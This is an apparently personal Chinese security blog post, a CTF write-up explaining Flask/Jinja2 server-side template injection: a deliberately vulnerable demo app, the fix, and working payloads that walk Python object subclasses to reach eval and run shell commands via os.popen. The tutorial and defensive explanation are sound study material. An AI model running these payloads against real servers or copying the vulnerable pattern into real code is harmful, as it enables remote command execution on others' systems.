<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta name="generator" content="Hexo 3.9.0"><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5"><title>浅析FLASK模板注入 | 青花@Blue_And_White</title><meta name="description" content="浅析FLASK模板注入"><meta name="keywords" content="web"><meta name="author" content="青花@Blue_And_White,blueandwhite@yeah.net"><meta name="copyright" content="青花@Blue_And_White"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/12/touxiang.jpg"><link rel="preconnect" href="//cdn.jsdelivr.net"><link rel="preconnect" href="https://fonts.googleapis.com" crossorigin><link rel="preconnect" href="//busuanzi.ibruce.info"><meta name="twitter:card" content="summary"><meta name="twitter:title" content="浅析FLASK模板注入"><meta name="twitter:description" content="浅析FLASK模板注入"><meta name="twitter:image" content="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/QQ%E6%88%AA%E5%9B%BE20211008201852.png"><meta property="og:type" content="article"><meta property="og:title" content="浅析FLASK模板注入"><meta property="og:url" content="https://www.evil-qinghua.me/2021/10/01/浅析FLASK模板注入/"><meta property="og:site_name" content="青花@Blue_And_White"><meta property="og:description" content="浅析FLASK模板注入"><meta property="og:image" content="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/QQ%E6%88%AA%E5%9B%BE20211008201852.png"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://cdn.jsdelivr.net/npm/js-cookie/dist/js.cookie.min.js"></script><script>const autoChangeMode = '1'
var t = Cookies.get("theme");
if (autoChangeMode == '1'){
const isDarkMode = window.matchMedia("(prefers-color-scheme: dark)").matches
const isLightMode = window.matchMedia("(prefers-color-scheme: light)").matches
const isNotSpecified = window.matchMedia("(prefers-color-scheme: no-preference)").matches
const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

if (t === undefined){
  if (isLightMode) activateLightMode()
  else if (isDarkMode) activateDarkMode()
  else if (isNotSpecified || hasNoSupport){
    console.log('You specified no preference for a color scheme or your browser does not support it. I Schedule dark mode during night time.')
    now = new Date();
    hour = now.getHours();
    isNight = hour < 6 || hour >= 18
    isNight ? activateDarkMode() : activateLightMode()
}
} else if (t == 'light') activateLightMode()
else activateDarkMode()


} else if (autoChangeMode == '2'){
  now = new Date();
  hour = now.getHours();
  isNight = hour < 6 || hour >= 18
  if(t === undefined) isNight? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode() 
} else {
  if ( t == 'dark' ) activateDarkMode()
  else if ( t == 'light') activateLightMode()
}

function activateDarkMode(){
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null){
    document.querySelector('meta[name="theme-color"]').setAttribute('content','#000')
  }
}
function activateLightMode(){
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null){
  document.querySelector('meta[name="theme-color"]').setAttribute('content','#fff')
  }
}</script><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="canonical" href="https://www.evil-qinghua.me/2021/10/01/浅析FLASK模板注入/"><link rel="prev" title="聊聊溯源反制那些事" href="https://www.evil-qinghua.me/2023/08/20/聊聊溯源那些事/"><link rel="next" title="反序列化的入门探索" href="https://www.evil-qinghua.me/2021/04/14/反序列化的简单入门学习/"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  translate: {"defaultEncoding":2,"translateDelay":0,"cookieDomain":"https://xxx/","msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"简"},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    title: 'Snackbar.bookmark.title',
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime_unit: '天',
  runtime: true,
  copyright: undefined,
  ClickShowText: undefined,
  medium_zoom: false,
  fancybox: true,
  Snackbar: undefined,
  baiduPush: false,
  isHome: false,
  isPost: true
  
}</script></head><body><canvas class="fireworks"></canvas><header> <div id="page-header"><span class="pull_left" id="blog_name"><a class="blog_title" id="site-name" href="/">青花@Blue_And_White</a></span><span class="toggle-menu pull_right close"><a class="site-page"><i class="fa fa-bars fa-fw" aria-hidden="true"></i></a></span><span class="pull_right menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 友情链接</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> 关于我</span></a></div></div></span><span class="pull_right" id="search_button"><a class="site-page social-icon search"><i class="fa fa-search fa-fw"></i><span> 搜索</span></a></span></div></header><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/12/touxiang.jpg" onerror="onerror=null;src='https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/images/404.jpg'" alt="avatar"></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">32</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">35</div></a></div></div><div class="mobile_data_item is-center">     <div class="mobile_data_link"><a href="/categories/"><div class="headline">分类</div><div class="length_num">19</div></a></div></div></div><hr><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 友情链接</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> 关于我</span></a></div></div></div><div id="mobile-sidebar-toc"><div class="toc_mobile_headline">目录</div><div class="sidebar-toc__content"><ol class="toc_mobile_items"><li class="toc_mobile_items-item toc_mobile_items-level-1"><a class="toc_mobile_items-link" href="#浅析FLASK模板注入"><span class="toc_mobile_items-number">1.</span> <span class="toc_mobile_items-text">浅析FLASK模板注入</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#前言："><span class="toc_mobile_items-number">1.1.</span> <span class="toc_mobile_items-text">前言：</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#1-问题出现"><span class="toc_mobile_items-number">1.2.</span> <span class="toc_mobile_items-text">1.问题出现</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#2-漏洞分析"><span class="toc_mobile_items-number">1.3.</span> <span class="toc_mobile_items-text">2.漏洞分析</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#3-漏洞利用"><span class="toc_mobile_items-number">1.4.</span> <span class="toc_mobile_items-text">3.漏洞利用</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#总结："><span class="toc_mobile_items-number">1.5.</span> <span class="toc_mobile_items-text">总结：</span></a></li></ol></li></ol></div></div></div><div id="body-wrap"><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true">     </i><div class="auto_open" id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#浅析FLASK模板注入"><span class="toc-number">1.</span> <span class="toc-text">浅析FLASK模板注入</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#前言："><span class="toc-number">1.1.</span> <span class="toc-text">前言：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-问题出现"><span class="toc-number">1.2.</span> <span class="toc-text">1.问题出现</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-漏洞分析"><span class="toc-number">1.3.</span> <span class="toc-text">2.漏洞分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-漏洞利用"><span class="toc-number">1.4.</span> <span class="toc-text">3.漏洞利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#总结："><span class="toc-number">1.5.</span> <span class="toc-text">总结：</span></a></li></ol></li></ol></div></div></div><main id="content-outer"><div id="top-container" style="background-image: url(https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/QQ%E6%88%AA%E5%9B%BE20211008201852.png)"><div id="post-info"><div id="post-title"><div class="posttitle">浅析FLASK模板注入</div></div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 发表于 2021-10-01<span class="post-meta__separator">|</span><i class="fa fa-history fa-fw" aria-hidden="true"></i> 更新于 2021-10-08</time><span class="post-meta__separator">|</span><span><i class="fa fa-inbox post-meta__icon fa-fw" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/web安全/">web安全</a></span><div class="post-meta-wordcount"><div class="post-meta-pv-cv"><span><i class="fa fa-eye post-meta__icon fa-fw" aria-hidden="true"> </i>阅读量:</span><span id="busuanzi_value_page_pv"></span></div></div></div></div></div><div class="layout layout_post" id="content-inner">   <article id="post"><div class="article-container" id="post-content"><h1 id="浅析FLASK模板注入"><a href="#浅析FLASK模板注入" class="headerlink" title="浅析FLASK模板注入"></a>浅析FLASK模板注入</h1><h2 id="前言："><a href="#前言：" class="headerlink" title="前言："></a>前言：</h2><p>​                最近搞学术之余又捡起了老本行WEB，然后刷了一些CTF题，发现了一个自己之前没有触碰的点，模板注入，感觉好像命令注入的玩意，看看了什么原理，利用方法，然后这里呢，也单独拎出来来细细的说一说。</p>
<h2 id="1-问题出现"><a href="#1-问题出现" class="headerlink" title="1.问题出现"></a>1.问题出现</h2><p>​    这个问题起源于一个CTF题，题目在攻防世界上CTF提高篇，有一个Web_python_template_injection,名称言简意赅，模板注入，打开之后<a href="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008173039367.png" data-fancybox="group" data-caption="image-20211008173039367" class="fancybox"><img src="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008173039367.png" alt="image-20211008173039367" title="image-20211008173039367"></a></p>
<p>看不到任何有价值的信息，Ctrl+U也没啥，没价值。</p>
<p>只能抓个包看看了，到底是哪个框架，哪个组件的利用。</p>
<p><a href="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008173541573.png" data-fancybox="group" data-caption="image-20211008173541573" class="fancybox"><img src="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008173541573.png" alt="image-20211008173541573" title="image-20211008173541573"></a></p>
<p>可以看到这是Flsak的一个组件，应该是flask的模板注入，那么接下来可以看看利用什么的了。</p>
<p><a href="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008173645929.png" data-fancybox="group" data-caption="image-20211008173645929" class="fancybox"><img src="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008173645929.png" alt="image-20211008173645929" title="image-20211008173645929"></a></p>
<p><a href="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008173730343.png" data-fancybox="group" data-caption="image-20211008173730343" class="fancybox"><img src="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008173730343.png" alt="image-20211008173730343" title="image-20211008173730343"></a></p>
<p>代码被执行了，说明确实问题存在。</p>
<p>那么下面就来分析分析这个漏洞，看看这个事的利用吧。</p>
<h2 id="2-漏洞分析"><a href="#2-漏洞分析" class="headerlink" title="2.漏洞分析"></a>2.漏洞分析</h2><p> 所谓模板注入漏洞，这个玩意我们一般叫做SSIT（Server-Side Template Injection）具体漏洞成因，还是用户控制了，参数了，然后服务端没有对其输入进行转义过滤，然后呢python内置的一些函数能够被用来利用，从而RCE，XSS利用这种。</p>
<p>还是用DEMO说话吧，</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">python</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request</span><br><span class="line"><span class="keyword">from</span> jinja2 <span class="keyword">import</span> Template</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route("/")</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">index</span><span class="params">()</span>:</span></span><br><span class="line">    name = request.args.get(<span class="string">'name'</span>, <span class="string">'guest'</span>)</span><br><span class="line"></span><br><span class="line">    t = Template(<span class="string">"Hello "</span> + name)</span><br><span class="line">    <span class="keyword">return</span> t.render()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    app.run(</span><br></pre></td></tr></table></figure></div>

<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Jinja 2是一种面向Python的现代和设计友好的模板语言，它是以Django的模板为模型的</span><br><span class="line"></span><br><span class="line">Jinja2 是 Flask 框架的一部分。Jinja2 会把模板参数提供的相应的值替换了 &#123;&#123;…&#125;&#125; 块</span><br><span class="line"></span><br><span class="line">Jinja2 模板同样支持控制语句，像在 &#123;%%&#125; 块中</span><br></pre></td></tr></table></figure></div>

<p>这个是jinja2的一些介绍，就可以理解为一个模板的语言解释器，这个不多说了，这玩意主要也是框架的事，我们主要说说这个漏洞。这个代码是个很经典的漏洞，一般vulhub什么的或者搭建docker环境复现都是这个代码。</p>
<p>问题出现在我们传入的name中，然后传入到Template中直接渲染利用了，当然也有修复方法，就是对于传入name进行转义或者编码</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">python</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">t = Template(<span class="string">"Hello &#123;&#123;n&#125;&#125;"</span> )</span><br><span class="line"><span class="keyword">return</span> t.render(n=name)</span><br></pre></td></tr></table></figure></div>

<p>当然你其他方法也可以，只要叫这个参数不在能够触发python的执行就行，在这里是用户的输入不能接触到这个渲染的执行。</p>
<p>所以嘛，既然这里存在这个漏洞，那就存在利用了。</p>
<h2 id="3-漏洞利用"><a href="#3-漏洞利用" class="headerlink" title="3.漏洞利用"></a>3.漏洞利用</h2><p>我们观察代码，这个东西是被放到解释器里面给渲染执行了，这时候你肯定说，那我们直接简单粗暴，os.system,os.popen，eval,exec,但是这里我们想想啊，你调用这个得用Python引入os把，但是前面代码根本就没有引入，那我们没法调用啊，那怎么办？当然有利用方法，这个方法还是归因于python语言的特性，我们知道py是基于对象的，每一对象的定义肯定会涉及到很多的类涉及到很多继承，然后创建一个对象，就可以去回溯他的继承的类的方法，如果他继承的这个类，村尊在我们上述说的这些函数，那么就可以执行系统命令，从而进行攻击。</p>
<p>这里上一张图，来说明这个漏洞构造payload的py端原理（这个东西也可以用来玩逃逸）</p>
<p><a href="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008192127904.png" data-fancybox="group" data-caption="image-20211008192127904" class="fancybox"><img src="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008192127904.png" alt="image-20211008192127904" title="image-20211008192127904"></a></p>
<p>我们先来看看py的魔术方法，也就是我们用来查看对象其种类的方法。</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">__class__ 返回类型所属的对象 </span><br><span class="line">__mro__ 返回一个包含对象所继承的基类元组，方法在解析时按照元组的顺序解析。 </span><br><span class="line">__base__ 返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的 </span><br><span class="line">__subclasses__ 每个新类都保留了子类的引用，这个方法返回一个类中仍然可用的的引用的列表 </span><br><span class="line">__init__ 类的初始化方法 </span><br><span class="line">__globals__ 对包含函数全局变量的字典的引用</span><br><span class="line">__builtin__ 内建函数，python中可以直接运行一些函数，例如int(),list()等等，这些函数可以在__builtins__中可以查到。查看的方法是dir(__builtins__)</span><br></pre></td></tr></table></figure></div>

<p><a href="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008183947904.png" data-fancybox="group" data-caption="image-20211008183947904" class="fancybox"><img src="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008183947904.png" alt="image-20211008183947904" title="image-20211008183947904"></a></p>
<p>我们可以从图中看到输入</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&quot;.__class__.__base__.subclasses__()</span><br></pre></td></tr></table></figure></div>

<p>所得到的其可以引用的类的列表，我们的目标是找到一个存在os调用的类，然后构造输入从而达到利用。那么如何找呢，这里提供一个通用的payload</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">python</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="keyword">for</span> c <span class="keyword">in</span> <span class="string">""</span>.__class__.__base__.__subclasses__() %&#125;</span><br><span class="line">&#123;% <span class="keyword">if</span> c.__name__ == <span class="string">'catch_warnings'</span> %&#125;</span><br><span class="line">  &#123;% <span class="keyword">for</span> b <span class="keyword">in</span> c.__init__.__globals__.values() %&#125;</span><br><span class="line">  &#123;% <span class="keyword">if</span> b.__class__ == &#123;&#125;.__class__ %&#125;</span><br><span class="line">    &#123;% <span class="keyword">if</span> <span class="string">'eval'</span> <span class="keyword">in</span> b.keys() %&#125;</span><br><span class="line">      &#123;&#123; b[<span class="string">'eval'</span>](<span class="string">'__import__("os").popen("terminal命令").read()'</span>) &#125;&#125;</span><br><span class="line">    &#123;% endif %&#125;</span><br><span class="line">  &#123;% endif %&#125;</span><br><span class="line">  &#123;% endfor %&#125;</span><br><span class="line">&#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure></div>

<p>请注意，这里面其实是python语言,因为我们要输入到url中执行，然后被flask解释渲染，所以就变成了这个样子，还原python代码，只需把其中的｛%%｝去掉就可以了，我们看大概的功能就是查找””字符串对象的一个引用的子类，如果这个子类中包含catch_warning模块，那么就能在进一步再去找到存在OS调用，或者存在eval等调用的模块，从而执行我们的命令。</p>
<p>在ctfdemo中的利用，这里我们一步一步构造payload不用上面的通杀利用方法，方便大家更好的理解漏洞利用原理</p>
<p>回归一开始那个CTF题，我们知道存在模板注入，那么我们第一步就要定位存在os模块的调用类，这边我了解到os一般会被</p>
<p>catch_warnings调用，那么我们先把其找出来，构造payload,这些都是我处理过的直接输入</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">python</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;[].__class__.__base__.__subclasses__()&#125;&#125;</span><br></pre></td></tr></table></figure></div>

<p>这个是列出来其基类中的所有子类</p>
<p><a href="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008193714189.png" data-fancybox="group" data-caption="image-20211008193714189" class="fancybox"><img src="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008193714189.png" alt="image-20211008193714189" title="image-20211008193714189"></a></p>
<p>发现catch_warnings</p>
<p>但是太乱太多了，怎么定位这个列表里面的下标啊，我们只需要构造以下代码</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#123;% for c in [].__class__.__base__.__subclasses__() %&#125;</span><br><span class="line">&#123;% if c.__name__ == &apos;catch_warnings&apos; %&#125;</span><br><span class="line">	&#123;&#123;[].__class__.__base__.__subclasses__().index(c)&#125;&#125;</span><br><span class="line">&#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure></div>

<p><a href="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008195125635.png" data-fancybox="group" data-caption="image-20211008195125635" class="fancybox"><img src="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008195125635.png" alt="image-20211008195125635" title="image-20211008195125635"></a></p>
<p>得到了下标59，我们继续向下利用。查看内置函数</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;[].__class__.__base__.__subclasses__()[59].__init__.__globals__.keys()&#125;&#125;</span><br></pre></td></tr></table></figure></div>

<p><a href="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008195407184.png" data-fancybox="group" data-caption="image-20211008195407184" class="fancybox"><img src="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008195407184.png" alt="image-20211008195407184" title="image-20211008195407184"></a></p>
<p>linecache中是存在OS调用的，我们可以继续构造查看,关于怎么找到对应的下标参考上面定下标的语法动手敲一敲吗！然后我们看到第13有一个<strong>builtins</strong></p>
<p>这个魔术方法我们说过，他能够执行python的一些内置函数的，那么我们就可以完成了啊，构造payload去执行命令</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;[].__class__.__base__.__subclasses__()[59].__init__.__globals__.values()[13][&apos;eval&apos;](&apos;__import__(&quot;os&quot;).popen(&quot;id&quot;).read()&apos;)&#125;&#125;</span><br></pre></td></tr></table></figure></div>

<p><a href="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008201117590.png" data-fancybox="group" data-caption="image-20211008201117590" class="fancybox"><img src="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008201117590.png" alt="image-20211008201117590" title="image-20211008201117590"></a></p>
<p><a href="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008201146852.png" data-fancybox="group" data-caption="image-20211008201146852" class="fancybox"><img src="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/image-20211008201146852.png" alt="image-20211008201146852" title="image-20211008201146852"></a></p>
<p>对于如何知道某个模块存在在那个类中，这个很难其实，这里仅仅是解出这一个题之后，我们把这个东西拆出来说的，但是在实际中利用，还是利用前面的那个通杀的脚本，来的实在，他会帮助我们找到对应的方法，自动定位执行。</p>
<h2 id="总结："><a href="#总结：" class="headerlink" title="总结："></a>总结：</h2><p>​        本次通过简单的说明了一下模版注入漏洞的成因，简单的fix一下，然后谈了谈其利用原理，以及利用方法，利用思想，最后利用一个CTF题来进行实际操作，其实不光是Py存在这种漏洞，大多数语言比如php，java等的框架也存在此类问题，其中利用方法也各有千秋，更深更广层次的利用还有待探究。</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:blueandwhite@yeah.net">青花@Blue_And_White</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://www.evil-qinghua.me/2021/10/01/浅析FLASK模板注入/">https://www.evil-qinghua.me/2021/10/01/浅析FLASK模板注入/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://www.evil-qinghua.me">青花@Blue_And_White</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/web/">web    </a></div><div class="post_share"><div class="social-share" data-image="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202110/QQ%E6%88%AA%E5%9B%BE20211008201852.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js"></script></div></div><div class="post-reward"><a class="reward-button button--primary button--animated"> <i class="fa fa-qrcode"></i> 打赏<div class="reward-main"><ul class="reward-all"><li class="reward-item"><img class="lazyload post-qr-code__img" src="/img/wechat.jpg" alt="微信"><div class="post-qr-code__desc">微信</div></li><li class="reward-item"><img class="lazyload post-qr-code__img" src="/img/alipay.jpg" alt="支付寶"><div class="post-qr-code__desc">支付寶</div></li></ul></div></a></div><nav class="pagination_post" id="pagination"><div class="prev-post pull_left"><a href="/2023/08/20/聊聊溯源那些事/"><img class="prev_cover lazyload" data-src="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202308/bluered.jpg" onerror="onerror=null;src='https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/images/404.jpg'"><div class="label">上一篇</div><div class="prev_info"><span>聊聊溯源反制那些事</span></div></a></div><div class="next-post pull_right"><a href="/2021/04/14/反序列化的简单入门学习/"><img class="next_cover lazyload" data-src="https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/202104/QQ%E6%88%AA%E5%9B%BE20210416182127.png" onerror="onerror=null;src='https://blueandwhite.oss-cn-beijing.aliyuncs.com/blog/images/404.jpg'"><div class="label">下一篇</div><div class="next_info"><span>反序列化的入门探索</span></div></a></div></nav><hr><div id="post-comment"><div class="comment_headling"><i class="fa fa-comments fa-fw" aria-hidden="true"></i><span> 评论</span></div><div class="vcomment" id="vcomment"></div><script src="https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script><script>var notify = false == true ? true : false;
var verify = false == true ? true : false;
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
